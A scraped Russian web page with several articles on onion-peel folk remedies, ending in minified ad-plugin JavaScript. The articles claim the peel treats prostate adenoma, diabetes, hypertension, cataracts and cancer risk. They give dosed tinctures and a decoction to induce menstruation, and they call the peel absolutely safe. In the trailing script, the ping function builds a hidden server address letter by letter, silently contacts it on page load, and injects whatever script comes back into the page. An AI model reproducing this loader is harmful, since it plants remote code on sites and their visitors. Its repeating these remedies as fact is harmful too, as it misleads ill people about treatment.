0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Обычный лук шелуха польза превосходит ожидания

Обычный лук: шелуха, польза превосходит ожидания

Ежедневно на кухне или столовой повара и домохозяйки чистят луковицы и многие даже не подозревают, что в мусорное ведро уходит ценнейший продукт — луковая шелуха, польза от которой неоценимая.

Особенно в периоды дефицита витаминов или отсутствия лекарств в аптечке.

Что может предложить человеку нежная кожица острого корнеплода

Родиной лука считается Ближний Восток.

Некоторые исследователи указывают точное место «рождения» — Афганистан.

Путешественники и торговцы всегда брали его с собой в дорогу, как средство, помогающее организму быстро адаптироваться к новым климатическим условиям, поэтому растение моментально распространилось в Греции, Древнем Риме, Руси и дальше по миру.

Ему приписывались волшебные возможности отгонять злых духов, охранять дом от нечистой силы, чистить окружающее пространство от вторжения демонов.

Приобрести такую популярность помогли накопления фитонцидов в самих плодах и множества витаминов в верхней обертке. Они стали огромным барьером для инфекционных болезней, размножения паразитов, микробов.

Отвары и настои из оранжевых листочков активно помогут огородникам в борьбе с вредителями, стимулируют рост рассады и удобрят, продезинфицируют почву перед посадкой. Это лучшая подкормка томатов, кабачков, огурцов, в разы повышает урожайность грядки, охраняет посадки от гнили. Помогает обойтись без химических составов.

Наблюдательные исследователи сделали правильные выводы и успешно применили знания о свойствах для оздоровления людей.

Горький лекарь, но настоящий

Давно известны лук, шелуха и их польза в народной медицине.

Армии кочевников после тяжелых сражений промывали раны и гнойные места настойками шуршащих оболочек, чтобы избежать заражений, сократить срок заживления резаных, колотых ранений.

Позже стало известно терапевтическое влияние на сосуды, функционирование сердечной мышцы, состояние бронхов, легких, гортани.

В народе готовят спиртовые водные, вытяжки, настои при обостренных суставных болях, почечных и печеночных коликах, сердечно-сосудистых сбоях. Успешно избавляются от простуд, вирусов, кожных дефектов. Поддаются быстрому излечению фурункулезы, абсцессы, грибки.

Чудодейственные особенности подтверждаются научными лабораторными опытами. Ученые обнаружили в продукте витамины групп В, Е, Р, С, РР, почти полный набор аминокислот, микроэлементы. Есть много фосфора, железа, очень дефицитного калия.

Биохимический анализ подтвердил способности шелухи, как антиоксиданта, обнаружил внутри волокон уникальный компонент кверцетин (4% концентрации), действующий биофлавоноид.

Фитонциды, по сравнению с вышеперечисленными составляющими частями, занимают лишь второе место рейтинга, но именно благодаря силе этих натуральных антисептиков человечество избавляется от ангин, гриппов, воспалений слизистых покровов. Данные свойства востребованы также в косметологии.

Заготовка качественных материалов и соблюдение доз в рецептах — залог успешного результата

Несомненная польза от шелухи лука при лечении ощущается с первых дней приема целительных снадобий.

Рецептура не слишком сложная.

Главное правильно заготовить сырьё.

Для оздоровительных целей годятся только луковицы, выросшие в экологически чистых регионах без применения инсектицидов, пестицидов, нитратных добавок.

Из просушенных здоровых луковиц надо снять верхние чешуйки не поврежденные, гнилью, болезнями и насекомыми.

Сложить слоями в чистую стеклянную посуду. Хранить в сухом помещении с низкой влажностью. Мыть проточной водой непосредственно перед началом приготовления.

Энергетический чай из чешуи репчатого лука

Утром 1 столовую ложку шелухи промыть, измельчить, запарить в чайнике или термосе 250 -300 мл крутого кипятка. Настоять 25 минут, процедить. Пить вприкуску с медом. Месяц каждодневного приема позитивно скажется на коже, волосах, ногтях, повысится жизненный тонус.

Настойка для лечения атеросклероза, варикозных расширений, гипертонических осложнений

Подготовленные листики молоть на кофемолке или перетолочь в ступке до состояния порошка. Засыпать в емкость из темного стекла, залить 100 мл спирта и плотно накрыть крышкой. Настаивать неделю в прохладном месте.

Пить курсом перед едой за полчаса 3 раза в день. В 1 ложку натурального неочищенного подсолнечного масла ввести 15-29 капель настойки. Длительность приема — 2 недели.

Шелуха лечит простатит, аденому

Один стакан свежего помытого сырья поместить в эмалированную кастрюлю, добавить 1 литр воды, закрыть, накипятить и оставить настаиваться в течение часа. Выпивать 5-6 глотков в день после еды месячным курсом. Повторно после перерыва в 10 дней.

Действенный способ пришел из Древней Руси. Горсть шелухи перемешать с 50 г толченой скорлупы фундука, лучше дикой лещины залить 2 литрами родниковой воды. Варить на маленьком огне не меньше 50-60 минут. Настоять 6 часов. Пить отвар утром и вечером после приемов пищи, по 75 мл на протяжении 3 недель.

Помочь суставам справиться с болью

Облегчить страдания, снизить болевые ощущения при артрите, подагре, поможет уксусная заправка с луковыми отходами. 80-100 грамм шелухи залить 250 г уксуса, настоять 12 дней при комнатной температуре.

Полученной жидкостью промачивать льняную салфетку и делать компрессную повязку на ночь.

Саму шелуху можно прикладывать к мозолям, предварительно смазав место аппликации кремом, маслом или вазелином, чтобы уберечься от ожога.

Снижение сахара в крови

Печеный лук, настойки действуют эффективнее, если не удалять кожицу. Для диабетиков с повышенным весом пригодится отвар луковичных оберток. В посуду с толстыми стенками поместить горсть качественных очистков долить водой 30° и держать герметично закрытым на паровой бане 40 минут. Процедить, остудить и пить вместо чая.

Это позволит контролировать процессы отложения жиров, накопления липидов, связать быстрые углеводы в кишечнике.

В скором будущем луковая шелуха сможет приносить пользу лечению различных заболеваний, как добавки. Производители БАДов в Индии серьезно заинтересовались силой продукта.

Важно взвесить все за и против

Луковые препараты, как любой гомеопатическое средство имеют противопоказания.

Определить их не тяжело, пройдя стандартную диагностику, консультацию специалистов.

Надо знать основной биохимический состав корнеплода, совместимость с другими лекарствами и состояние собственного организма.

Нельзя употреблять отвары, вытяжки, настойки в периоды прогрессирующих язв ЖКТ, при циррозах, гломерулонефритах, пороках сердца.

Склонность к тромбофлебиту, быстрой свертываемости крови, тоже повод задуматься о пользе, вреде лука и шелухи из-за концентрации рутина. Напитки, содержащие алкоголь, надо исключить из рациона до начала лечения у фитотерапевта. Консультирование у врача предотвратит не желательные осложнения, гарантирует 100% защищенность от неудач.

Абсолютно безвредным и приемлемым считается кулинарное применение шелухи, для придания красивого, цвета и приятного запаха тушеной рыбе, бульону. Хорошо переносится краситель, особенно привлекательно и вкусно выглядят пасхальные яйца сваренный в растворе.

Природа сделала людям королевский подарок в полезнейшей упаковке, так зачем ее выбрасывать просто так.

О пользе луковой шелухи – на видео:

Заметили ошибку? Выделите ее и нажмите Ctrl+Enter, чтобы сообщить нам.

Луковый чай: польза и вред, отзывы

Полезные свойства лука уже много веков используются народной медициной. Этот овощ смог уберечь множество жизней во время эпидемии чумы в Европе, в 14-м веке. Большинство тех людей, которые обвешивали свои дома связками разрезанного лука, остались живы. Полезные свойства растения использовали и в античные времена. Врачи Древней Греции для уничтожения инфекции раскладывали около кровати больного пневмонией куски этого уникального овоща. А также поили пациентов луковым чаем.

Уникальный напиток

Лук содержит огромное количество различных витаминов и микроэлементов. Его сок является природным антибиотиком, способным уничтожить стафилококк, стрептококк, туберкулезную, дифтерийную и дизентерийную палочку. А также вирусы. Кроме этого овощ способствует кроветворению, выводит токсины и даже способен противостоять раковым заболеваниям.

Несколько головок репчатого лука можно найти практически на любой кухне. Во время приготовления еды его шелуха выбрасывается как бесполезный мусор. На самом деле это ценнейший продукт, из которого можно готовить полезный луковый чай. Этот необычный напиток используется для укрепления организма и лечения многочисленных патологий.

В состав чая из лука входят такие вещества:

  1. Кверцетин. Это сильнейший антиоксидант, обладающий противовоспалительными и антиокислительными свойствами. Укрепляет сердечно-сосудистую систему. Входит в состав многих БАДов.
  2. Аскорбиновая кислота. Незаменимый помощник при простудах и вирусных заболеваниях.
  3. Каротин. Улучшает процессы мозговой деятельности и положительно влияет на пищеварение.
  4. Витамин Е. Улучшает состояние кожи и волос. Поддерживает эластичность сосудов, укрепляет сердечную мышцу.
  5. Фитонциды. Укрепляют иммунную систему, а также зубы и кости.
  6. Железо. Нормализует работу гормональной системы и улучшает обмен веществ.
  7. Калий. Необходим для синтеза белка, нормальной работы почек и кишечника.
  8. Кальций. О пользе этого элемента для костей и зубов известно даже детям.

Луковый чай содержит множество полезных веществ. Но наиболее ценным является кверцетин. Ученые доказали, что это вещество снижает риск тромбоза, инсульта и инфаркта. Кверцетин останавливает развитие рака крови, груди и других онкологических заболеваний. Кроме этого флавоноиды обладают следующими свойствами:

  1. Антигистаминным.
  2. Гипотензивным.
  3. Антиоксидантным.
  4. Онкопротекторным.
  5. Антисклеротическим.
  6. Кардиопротекторным.
  7. Регенеративным.
  8. Иммуностимулирующим.

Свойства чая

Чай, приготовленный из лука или его шелухи, имеет специфический вкус и запах. Но эти недостатки легко компенсируют его уникальный состав и польза. Луковый чай оказывает на организм такое воздействие:

  1. Уменьшает отеки и боль в ногах.
  2. Обладает антигистаминным эффектом. Это очень хорошее средство против любых проявлений аллергии.
  3. Улучшает пищеварение, борется с метеоризмом.
  4. Выводит из организма тяжелые металлы и другие токсины.
  5. Стабилизирует давление, оздоравливает сердце, защищает сосуды. Помогает избежать инсульта и инфаркта. Эффективно борется с тромбофлебитом.
  6. Поднимает иммунитет. Эффективен в борьбе с простудой и гриппом.
  7. Помогает в борьбе с лишним весом. Нормализует обмен веществ.
  8. Снижает вероятность развития онкологии. Может применяться во время лечения химиотерапией.
  9. Эффективен при заболеваниях полости рта, например стоматите и гингивите.
  10. Оказывает желчегонный эффект. Может быть использован в качестве мягкого слабительного.
  11. Снимает головную боль.
  12. Улучшает зрение. Борется с проявлениями глаукомы и катаракты.
  13. Помогает при цистите и воспалительных заболеваниях почек.
  14. Устраняет боль во время менструации.
  15. Позволяет нормализовать уровень сахара в крови у больных диабетом.
  16. Уменьшает количество приступов при бронхиальной астме. Хорошо помогает при сухом кашле.

Противопоказания

Луковая шелуха абсолютно безопасна для организма. Она не содержит токсинов и вредных веществ. Несмотря на это, пить луковый чай, как обычный черный, не стоит. Все-таки это лекарственное средство, которым не рекомендуется злоупотреблять.

С осторожностью принимать этот напиток нужно людям, у которых повышенная свертываемость крови. Лук содержит кверцетин, высокая концентрация которого может быть опасна. Злоупотребление напитком способно привести к тому, что кровь станет еще гуще.

Отказаться от чая из лука рекомендуется людям с аллергией на этот овощ. А также тем, кто страдает непереносимостью отдельных веществ, входящих в его состав. С осторожностью следует принимать чай из шелухи гипотоникам.

Приготовление напитка

Существует несколько вариантов заваривания чая. Классический вариант можно использовать, если напиток употребляется в профилактических целях, а не для борьбы с конкретным заболеванием. Важно помнить о том, что заваривать шелуху впрок нельзя. Она теряет свои целебные свойства и превращается в отраву. Поэтому готовить напиток следует непосредственно перед употреблением.

Для одной порции чая потребуется шелуха от двух средних луковиц. Ее обязательно промывают под проточной водой. Затем перекладывают в стакан и заливают кипятком. Емкость накрывают блюдцем. Через полчаса напиток готов.

Пить чай из лука решится не каждый гурман. На вид этот напиток выглядит довольно аппетитно. Он отличается красивым бордовым оттенком с золотыми переливами. По внешнему виду он напоминает обычный черный чай. Выдать его может только необычный запах.

Несмотря на специфический вкус, у этого напитка множество поклонников. Убедиться в этом несложно, изучив на разных форумах их многочисленные положительные отзывы. Луковый чай можно сделать еще более полезным, если добавить в него мед, шиповник, липу, мяту, лимон или черную смородину. К сожалению, улучшить вкус напитка это не поможет.

Лечение органов ЖКТ

Боль в животе можно снимать не только аптечными медикаментами. Для избавления от дискомфорта и вздутия кишечника существует очень простой рецепт. Луковый чай, приготовленный из свежего овоща, а не его шелухи, позволит в считаные минуты устранить неприятные симптомы. Он снимает боль, нормализует стул и работу кишечника.

Для приготовления напитка потребуется заварить половину стакан качественного черного чая. Затем взять небольшую луковицу, очистить от шелухи и разрезать ее накрест, но не насквозь. Она должна держать форму.

Луковицу опускают в горячий, свежезаваренный черный чай и оставляют на 10 минут. После этого жидкость можно пить. Облегчение наступает в течение 20-30 минут.

Лечение простуды и гриппа

Чай из луковой шелухи — это отличное средство в борьбе с простудой, гриппом и заболеваниями органов дыхания. Его рекомендуется использовать в комплексе с медикаментозной терапией. Но перед тем как заваривать луковый чай и лечить с его помощью себя или ребенка, рекомендуется проконсультироваться с врачом.

При простудных заболеваниях полезными будут следующие рецепты:

  1. Соединить по столовой ложке шелухи от лука и корень солодки, добавить 40 г измельченной хвои. Все это залить двумя литрами кипятка. Поставить смесь на маленький огонь на 20 минут. За две-три минуты до конца приготовления в жидкость добавить две столовые ложки измельченного шиповника. Затем чай переливают в термос и оставляют на 12 часов. В день следует выпивать не менее литра процеженного напитка.
  2. Две столовые ложки измельченной шелухи заливают двумя стаканами горячей воды. В течение 15 минут чай кипятят на слабом огне. Употребляют без добавок, по половине стакана до еды. Это средство отлично помогает при кашле.
  3. Чтобы снизить температуру, потребуется соединить по две столовые ложки шелухи от лука, цветки липы и натуральный мед. Залить смесь тремя стаканами кипятка. После того как чай остынет, пить три раза в день по 250 мл.

Лечение аллергии и астмы

Луковый чай помогает снять симптомы аллергии и облегчить состояние при астме. Рецепты, которые используются для борьбы с этими патологиями, подходят и для профилактики инсульта:

  1. Пять столовых ложек измельченных иголок сосны соединяют с 10 г луковой шелухи и 20 г раздавленного шиповника. Смесь заливается литром кипятка и варится на слабом огне в течение 10 минут. Готовый чай переливают в термос и настаивают в течение ночи. За сутки необходимо выпивать не менее литра теплого напитка.
  2. Столовую ложку шелухи соединяют с таким же объемом сосновых почек. Затем добавляют по 20 г измельченных листьев подорожника и мать-и-мачехи. Растения заливают 500 мл холодной воды. Через час жидкость следует прокипятить в течение семи минут. Употребляют по 20 мл напитка три раза в день.

Похудение и нормализация сахара в крови

Луковый чай помогает нормализовать обмен веществ и снизить уровень сахара в крови. Поэтому его полезно пить людям, которые желают сбросить вес, а также диабетикам.

Для приготовления чая потребуется столовую ложку измельченной шелухи залить литром холодной воды. Поставить жидкость на огонь, довести до кипения и варить после этого в течение пяти минут. Готовый чай должен немного настояться. За сутки следует выпивать не менее трех стаканов. В напиток можно добавить дольку лимона.

Отзывы

Эффективность уникального продукта подтверждают многочисленные отзывы. Польза и вред лукового чая несопоставимы. Этот продукт полностью натуральный, дешевый и при этом безопасный. Кроме этого он имеет минимум противопоказаний.

В отзывах люди пишут о том, что чай помогает от боли в позвоночнике, снимает отеки и нормализует работу кишечника. Прием отвара помогает даже лечить мигрень. Единственным недостатком можно считать специфический запах и неприятный вкус продукта. Но на это можно закрыть глаза из-за невероятных целебных свойств лукового чая.

Полезные свойства и противопоказания луковой шелухи для организма

Репчатый лук является одним из основных ингредиентов многих вкусных и популярных блюд русской кухни. Без этого овоща не может обойтись ни одна хозяйка. Луковую же шелуху практически все люди просто выбрасывают, так как думают, что она совершенно бесполезна и никакими лечебными свойствами не обладает.

Но данное утверждение не соответствует истине. Кожура этого овоща помогает бороться со многими заболеваниями и является отличной профилактикой их возникновения и развития. Наши предки прекрасно об этом знали, поэтому с давних времен использовали луковую шелуху в лечебных и косметологических целях. Пришло время узнать больше о полезных свойствах шелухи лука репчатого.

Химический состав луковой шелухи

Полезные вещества содержатся не в самой луковой шелухе, а в соке клеток, из которых она и состоит. Целебные свойства сока сохраняются в неизменном виде благодаря высокопрочной целлюлозной оболочке клеток. Извлечь полезный сок из клеток можно при помощи варки луковой шелухи в кипящей воде, которая никак не влияет на него и не уменьшает количество содержащихся в нем полезных веществ.

В своем составе луковая шелуха, которая является состарившимися покровными чешуйками луковицы, содержит витамины, различные неорганические и органические соединения. В состав кожуры репчатого лука входят следующие вещества:

  • витамин С;
  • каротин;
  • соединения серы;
  • минеральные соли калия;
  • кверцетин;
  • минеральные соли фосфора;
  • витамин Р;
  • клетчатка;
  • витамин Е;
  • минеральные соли железа;
  • фитонциды;
  • витамин РР;
  • минеральные соли магния;
  • фруктаны;
  • минеральные соли фосфора;
  • рутин;
  • витамины группы В;
  • минеральные соли кальция.

Полезные свойства луковой шелухи

Луковая шелуха имеет массу полезных свойств и благотворно влияет на организм человека. Входящий в её состав кверцетин, который является биологически активным соединением, относящимся к группе витамина Р, обладает ярко выраженными противовоспалительными, противоаллергическими, бактерицидными, иммуностимулирующими свойствами. Он усиливает действие витамина С, который стимулирует иммунную и многие другие системы человеческого организма, является отличной профилактикой простудных заболеваний, авитаминоза, нормализует окислительно-восстановительные процессы, борется с кровоточивостью десен, улучшает состояние сосудов, повышает уровень их упругости и эластичности.

Каротин – эффективный антиоксидант, который помогает организму нейтрализовать негативное воздействие свободных радикалов, грибков, гнили, патогенных микроорганизмов. Фитонциды, входящие в состав кожуры репчатого лука, активно борются с гриппом, ларингитом, воспалением легких, ангиной, другими воспалительными процессами, происходящими в организме.

Витамин Е помогает замедлить естественный процесс старения. Он предотвращает развитие злокачественных и доброкачественных опухолей. Витамин Е усиливает положительное действие витамина А.

Каротин и витамин РР улучшают работу желудочно-кишечного тракта, устраняют желудочные и кишечные расстройства, нормализуют работу головного мозга, ускоряют углеводный обмен.

Благодаря биологически активным веществам, входящим в состав луковой шелухи, она является прекрасным антисептиком и сильным антиоксидантом, обладает мягкими слабительным, желчегонным и мочегонным действиями, тонизирует организм, очищает сосуды, укрепляет их стенки и препятствует возникновению тромбов, снимает спазмы и болевые ощущения у женщин в преддверии и во время месячных.

Луковая кожура повышает уровень гемоглобина в крови, способствует более быстрому заживлению ран и восстановлению кожных покровов, улучшает состояние волос и помогает избавиться от перхоти. Она является отличной профилактикой инфарктов и инсультов, помогает разжижать мокроту при кашле, благотворно влияет на работу сердечно-сосудистой системы.

Лечебные свойства

Луковая шелуха используется для лечения определенных вирусных, простудных болезней, заболеваний пищеварительной системы, сердца, сосудов, почек и желчного пузыря, инфекций ротовой полости, мочеполовых инфекций, кожных грибковых поражений. Данный продукт помогает избавиться от диабета, аллергии, астмы, цистита, геморроя.

Луковая кожура избавит мужчин от аденомы и простатита. Она поможет укрепить иммунную систему, излечить варикозное расширение вен, катаракту, себорею, стоматит, гингивит. Благодаря луковой шелухе риск развития тромбозов, инфарктов и инсультов снижается в несколько раз.

Луковая шелуха для укрепления иммунитета

Чем сильнее и крепче у вас иммунитет, тем быстрее ваш организм сможет справиться с вирусными и простудными заболеваниями. Чтобы укрепить иммунную систему при помощи луковой кожуры, вам необходимо приготовить лечебный отвар.

Для приготовления целебного отвара вам понадобятся следующие ингредиенты:

  • 1 столовая ложка шелухи репчатого лука;
  • 1 столовая ложка солодкового корня;
  • 1 столовая ложка сосновой хвои;
  • 1 столовая ложка ягод шиповника.

Смешайте луковую кожуру, солодковый корень и сосновую хвою, поместите их в кастрюлю, залейте 2‑я литрами воды и варите 15 – 20 минут на медленном огне. Затем добавьте в кастрюлю шиповник и варите смесь еще 2 – 3 минуты.

Снимите кастрюлю с огня, перелейте отвар в термос и настаивайте его 10 – 12 часов. Специалисты рекомендуют готовить такой отвар вечером, чтобы вы могли пить его на протяжении всего следующего дня. Не забудьте немного подогреть отвар непосредственно перед его употреблением.

При бронхите

Для приготовления целебного отвара из шелухи репчатого лука, который поможет избавиться от острого бронхита, вам необходимо кожуру от 15 – 18 луковиц среднего размера залить 1 литром воды комнатной температуры.

Смесь следует довести до кипения и варить на медленном огне до тех пор, пока половина жидкости не испарится. После этого смесь нужно снять с огня, охладить и процедить.

Специалисты рекомендуют принимать по 2 столовых ложки отвара 3 – 5 раз в день.

Луковая шелуха от повышенного давления

Чтобы приготовить эффективное домашнее средство от давления на основе луковой шелухи, вам необходимо взять 4 столовые ложки кожуры репчатого лука, а затем залить сырье 700 – 750 мл горячей воды. Варить отвар следует на слабом огне. Делать это нужно на протяжении 5 – 8 минут.

Готовый отвар необходимо 60 – 80 минут настаивать в термосе, а затем его следует процедить и принимать после приема пищи по 100 мл три раза в день.

Продолжительность курса лечения – 2 недели.

Луковая шелуха от варикоза ног

Вылечить варикозное расширение вен поможет целебный луковый отвар. Для его приготовления вам понадобятся луковая шелуха (4 столовые ложки) и молоко (2 литра). Луковую кожуру необходимо залить молоком и варить 10 – 12 минут на медленном огне. Готовый отвар нужно остудить и процедить, затем легкими и аккуратными массажными движениями втирать на ночь в проблемные участки кожи ног, а утром смыть.

Продолжительность курса лечения – 10 – 14 дней, после чего необходимо сделать 30-дневный перерыв.

Луковая шелуха для месячных

Чтобы восстановить естественный месячный цикл, вызвать месячные и снять болевые ощущения во время менструации, специалисты рекомендуют приготовить целебный отвар. 50 г луковой шелухи поместите в емкость из стекла и залейте 500 мл кипятка. Затем поставьте смесь на водяную баню и томите до тех пор, пока половина жидкости не испарится.

В результате у вас должно получиться 200 мл готового отвара, который нужно выпить за один раз на голодный желудок. Если с помощью данного отвара вы хотели вызвать менструацию, но на следующий день она не началась, то повторять процедуру ни в коем случае нельзя. Вам следует обратиться за помощью к гинекологу.

Луковая шелуха для роста волос

Для приготовления отвара, который ускоряет рост волос, придает им блеск, обладает общеукрепляющим действием и подходит для всех типов волос, следует 1 стакан воды (200 мл) довести до кипения, охладить до комнатной температуры и залить 200 мл луковой шелухи, которую предварительно нужно поместить в подходящую посудину. Подойдет любая посуда, кроме металлической.

Смесь следует накрыть и оставить настаиваться в течение 10 – 12 часов. Готовый отвар необходимо процедить и ополаскивать им волосы после каждого мытья шампунем.

Результаты будут заметны уже через 2 – 3 недели регулярного использования.

Если вы хотите избавиться от перхоти, то можете усовершенствовать данный рецепт и добавить к шелухе репчатого лука 1 столовую ложку листьев крапивы.

Противопоказания к применению луковой шелухи

Хотя кожура репчатого лука обладает массой лечебным свойств, людям, страдающим определенными заболеваниями желудочно-кишечного тракта в период их обострения, повышенной свертываемостью крови, аллергическими реакциями на данный продукт или индивидуальной непереносимостью любого вещества, входящего в состав кожуры, специалисты советуют отказаться от её использования.

Почему людям с повышенной свертываемостью крови запрещено применять луковую шелуху? Дело в том, что кверцетин, который входит в её состав, влияет на густоту крови и способствует её сгущению.

Будущим мамочкам и женщинам, кормящим грудью, специалисты не рекомендуют слишком часто использовать отвары и настои из луковой шелухи, так как они не только может навредить ребенку, но и спровоцировать возникновение аллергических реакций и астматических приступов и у малыша, и у его матери.

О наличии у вас некоторых указанных выше заболеваниях вы можете и не догадываться. Поэтому перед началом применения луковой шелухи следует в обязательном порядке проконсультироваться с высококвалифицированным и опытным специалистом.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Отвар луковой шелухи: польза и вред

Луковая шелуха относится к тем продуктам, которые хозяйки и дачники утилизируют не задумываясь. Между тем такое решение можно назвать как минимум опрометчивым. Ведь защитная кожица репчатого лука — источник витаминов и множества других полезных микроэлементов. Рассмотрим в статье отвар луковой шелухи: польза и вред.

Полезные свойства

Прежде чем говорить о реальной пользе, которую несёт в себе это средство, нужно разобраться с его составом. Следующее вещества в обилии содержатся в твёрдой кожице репчатого лука:

  • витамины: группы B, C (аскорбиновая кислота), E, PP.
  • соли: кальция, железа, калия;
  • органические кислоты;
  • каротин;
  • кверцетин;
  • фитонциды.

Если говрить о том, чем полезен отвар луковой шелухи, то особенно интересны последние три компонента. Каротин помогает наладить работу сердечно-сосудистой системы, профилактирует болезни ЖКТ.
Кверцетин — мощное иммуностимулирующее биологическое соединение, обладает противовоспалительными и антимикробными свойствами.
Фитонциды — образуемые растениями вещества, подавляющие деятельность бактерий и микроскопических грибов. Попадая в организм, они помогают ему бороться с вирусами и инфекционными заболеваниями. Именно это — самые полезные свойства отвара из луковой шелухи.

Отвар луковой шелухи: польза

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
